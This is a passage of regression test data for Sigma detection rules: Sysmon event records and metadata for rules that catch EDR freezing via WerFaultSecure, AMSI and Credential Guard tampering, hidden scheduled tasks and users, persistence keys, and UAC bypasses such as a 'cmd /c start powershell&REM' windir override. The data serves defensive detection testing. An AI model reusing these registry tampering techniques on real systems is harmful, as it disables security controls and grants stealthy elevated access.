"swachchhanda\\xodih", "LogonGuid": "0197231E-5032-6940-AAE2-070000000000", "LogonId": "0x7e2aa", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0", "ParentProcessGuid": "0197231E-FB8C-6949-2310-000000000D00", "ParentProcessId": 22176, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml ================================================ id: eca9f987-800a-4b32-92ec-2d50a0a120a0 description: N/A date: 2025-12-23 author: Swachchhanda Shrawan Poudel (Nextron 
Systems) rule_metadata: - id: 22154f0e-5132-4a54-aa78-cc62f6def531 title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-11-27T08:12:45.186674Z" } }, "EventRecordID": 733879, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3544, "ThreadID": 4264 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-11-27 08:12:45.183", "ProcessGuid": "0197231E-07FD-6928-2A0C-000000000D00", "ProcessId": 3532, "Image": "C:\\Windows\\System32\\WerFaultSecure.exe", "FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)", "Description": "Windows Fault Reporting", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "WerFaultSecure.exe", "CommandLine": "C:\\Windows\\System32\\WerFaultSecure.exe /h /pid 3472 /tid 3476 /encfile 304 /cancel 364 /type 268310", "CurrentDirectory": "C:\\WINDOWS", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-B736-6923-B25C-3B0000000000", "LogonId": 
"0x3b5cb2", "TerminalSessionId": 1, "IntegrityLevel": "High", "Hashes": "SHA1=9521BDCD891789724786BDCB9C9468A06818EDDC,MD5=C5A2014C3BC84EDCEEF5185AEA3BB5E0,SHA256=1C60BA5771201F7AEE44DCA30CBCBF78F6E3C39F30AD0A5C6C7BC8137A475EAA,IMPHASH=79E7A5E4F18B29329345D2098E1B95EB", "ParentProcessGuid": "0197231E-07FD-6928-290C-000000000D00", "ParentProcessId": 9388, "ParentImage": "C:\\Users\\xodih\\Downloads\\EDRFreeze-gnu.exe", "ParentCommandLine": "EDRFreeze-gnu.exe 3472 10000", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml ================================================ id: 68010a5c-f8bf-4a2c-8cd0-038d4009805e description: N/A date: 2025-11-27 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2 title: PPL Tampering Via WerFaultSecure regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 12, "Version": 2, "Level": 4, "Task": 12, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-26T19:24:05.918776Z" } }, "EventRecordID": 18298, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3484, "ThreadID": 3424 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "DeleteValue", "UtcTime": "2025-12-26 19:24:05.918", "ProcessGuid": "0197231E-E0D5-694E-3803-000000000A00", "ProcessId": 11088, "Image": "C:\\WINDOWS\\system32\\reg.exe", "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\RequirePlatformSecurityFeatures", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml ================================================ id: 2e3725ae-2eaa-48a2-9d9b-4a7d55a75974 description: N/A date: 2025-12-26 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: d645ef86-2396-48a1-a2b6-b629ca3f57ff title: Windows Credential Guard Related Registry Value Deleted - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 12, "Version": 2, "Level": 4, "Task": 12, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T00:11:12.880834Z" } }, "EventRecordID": 16786799, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, 
"Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "DeleteKey", "UtcTime": "2025-10-26 00:11:12.865", "ProcessGuid": "5AA13A44-6720-68FD-3E3F-000000004002", "ProcessId": 6016, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml ================================================ id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 41d1058a-aea7-4952-9293-29eaaf516465 title: Removal Of AMSI Provider Registry Keys regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 12, "Version": 2, "Level": 4, "Task": 12, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:56:57.832430Z" } }, "EventRecordID": 111828, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "DeleteKey", "UtcTime": "2025-10-24 23:56:57.828", "ProcessGuid": "5AA13A44-1246-68FC-781E-000000004002", "ProcessId": 9880, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml ================================================ id: 3c0a5ddd-6241-4b52-9718-b12920e082ef description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55 title: RunMRU Registry Key Deletion - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 12, "Version": 2, "Level": 4, "Task": 12, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T00:01:59.334619Z" } }, "EventRecordID": 156421, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "DeleteValue", "UtcTime": "2025-10-25 00:01:59.330", "ProcessGuid": "5AA13A44-1377-68FC-A61E-000000004002", "ProcessId": 5160, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\Index", "User": "NT AUTHORITY\\SYSTEM" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml ================================================ id: f3670cef-9f21-4a86-901b-c28c285f3b52 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec title: Removal Of Index Value to Hide Schedule Task - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 12, "Version": 2, "Level": 4, "Task": 12, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T00:01:54.872810Z" } }, "EventRecordID": 155709, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 
3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "DeleteValue", "UtcTime": "2025-10-25 00:01:54.861", "ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002", "ProcessId": 7008, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD", "User": "NT AUTHORITY\\SYSTEM" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml ================================================ id: b796fd1e-a03a-4db8-a072-c597b6e0da1b description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: acd74772-5f88-45c7-956b-6a7b36c294d2 title: Removal Of SD Value to Hide Schedule Task - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2020-12-18T17:56:07.017817Z" } }, "EventRecordID": 596571, "Correlation": null, "Execution": { "#attributes": { 
"ProcessID": 3552, "ThreadID": 5004 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "MSEDGEWIN10", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "Hidden Local Account Created", "EventType": "SetValue", "UtcTime": "2020-12-18 17:56:07.015", "ProcessGuid": "747F3D96-68DD-5FDD-0000-00101B660000", "ProcessId": 648, "Image": "C:\\Windows\\system32\\lsass.exe", "TargetObject": "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)", "Details": "Binary Data" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml ================================================ id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a description: N/A date: 2025-10-31 author: SigmaHQ Team rule_metadata: - id: 460479f3-80b7-42da-9c43-2cc1d54dbccd title: Creation of a Local Hidden User Account by Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:28:03.064387Z" } }, "EventRecordID": 27517409, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:28:03.060", "ProcessGuid": "5AA13A44-5A23-68FE-2155-000000004002", "ProcessId": 4400, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\\(Default)", "Details": "Service", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml ================================================ id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 1547e27c-3974-43e2-a7d7-7f484fb928ec title: Registry Persistence via Service in Safe Mode regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:33:36.133400Z" } }, "EventRecordID": 27619790, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:33:36.131", "ProcessGuid": "5AA13A44-5B70-68FE-4655-000000004002", "ProcessId": 8024, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Print\\Monitors\\AtomicRedTeam\\Driver", "Details": "C:\\AtomicRedTeam\\atomics\\T1547.010\\bin\\PortMonitor.dll", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml ================================================ id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e title: Add Port Monitor Persistence in Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:36:04.950926Z" } }, "EventRecordID": 27665830, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, 
"Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:36:04.941", "ProcessGuid": "5AA13A44-5C04-68FE-5855-000000004002", "ProcessId": 10080, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp", "Details": "DWORD (0x00000001)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml ================================================ id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b title: Allow RDP Remote Assistance Feature regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-25T10:58:31.890479Z" } }, "EventRecordID": 16031, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": 
"Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-12-25 10:58:31.888", "ProcessGuid": "0197231E-EC48-694C-AA0C-000000000800", "ProcessId": 12456, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-2555720767-1205513275-3893774561-1001\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", "Details": "DWORD (0x00000000)", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml ================================================ id: a02685df-b4dd-4f5b-b120-9127e1662022 description: N/A date: 2025-12-25 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: aa37cbb0-da36-42cb-a90f-fdf216fc7467 title: AMSI Disabled via Registry Modification regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:41:48.911849Z" } }, "EventRecordID": 27772045, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, 
"ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:41:48.898", "ProcessGuid": "5AA13A44-5D5B-68FE-7B55-000000004002", "ProcessId": 420, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\Folder\\shell\\open\\command\\DelegateExecute", "Details": "(Empty)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml ================================================ id: 7fce1d05-2297-48a4-a670-f28745819c8a description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 46dd5308-4572-4d12-aa43-8938f0184d4f title: Bypass UAC Using DelegateExecute regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:43:38.730630Z" } }, "EventRecordID": 27806256, "Correlation": null, "Execution": { 
"#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:43:38.715", "ProcessGuid": "5AA13A44-5DCA-68FE-8B55-000000004002", "ProcessId": 9920, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\mscfile\\shell\\open\\command\\(Default)", "Details": "C:\\Windows\\System32\\cmd.exe", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml ================================================ id: a6667fba-7437-4b37-8584-5de021f91115 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af title: Bypass UAC Using Event Viewer regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T17:50:12.576627Z" } }, "EventRecordID": 27929906, "Correlation": null, 
"Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 17:50:12.565", "ProcessGuid": "5AA13A44-5F54-68FE-B455-000000004002", "ProcessId": 2768, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\windir", "Details": "cmd /c start powershell&REM", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml ================================================ id: 48965782-760d-4620-9bf3-7fb0bb441d0f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 724ea201-6514-4f38-9739-e5973c34f49a title: Bypass UAC Using SilentCleanup Task regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:10:21.083557Z" } }, "EventRecordID": 28299540, "Correlation": null, "Execution": { 
